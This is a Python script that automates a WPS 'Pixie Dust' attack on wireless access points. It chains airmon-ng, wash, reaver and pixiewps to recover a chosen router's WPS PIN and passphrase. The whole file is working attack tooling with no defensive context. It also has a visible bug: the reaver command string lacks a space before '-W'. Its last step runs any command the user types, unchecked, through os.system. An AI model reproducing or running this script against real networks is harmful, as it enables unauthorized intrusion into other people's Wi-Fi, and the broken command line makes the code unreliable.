#!/usr/bin/python
import os
import socket

os.system("clear")
os.system("airmon-ng check kill")
os.system("iwconfig")
WLANinput=raw_input("\nEnter your adapter name:")
os.system("airmon-ng start " + WLANinput)
os.system("echo Control+C when your done looking")
os.system("wash -i " + WLANinput)
MACinput=raw_input("\nEnter MAC Address for Accesspoint:")
os.system("reaver -i " + WLANinput + " -b " + MACinput + "-W -N -vv -g 2")
os.system("echo ")
os.system("echo ")
os.system("echo THE FOLLOWING COMMAND NEEDS THE VALUES FOUND IN THE REAVER OUTPUT ABOVE")
os.system("echo ")
os.system("echo FILL IN ANY DATA IN QUOTES WITH THE EXACT VALUES FOUND IN THE REAVER OUTPUT ABOVE")
os.system("echo ")
os.system("echo ")
os.system("echo TYPE THIS COMMAND: pixiewps -e \'PKE\' -s \'E-HASH1\' -z \'E-HASH2\' -a \'AUTHKEY\' -n \'E-NONCE\' -S")
FinalInput=raw_input("\nEnter the pixie command above with proper data:")
os.system(FinalInput)
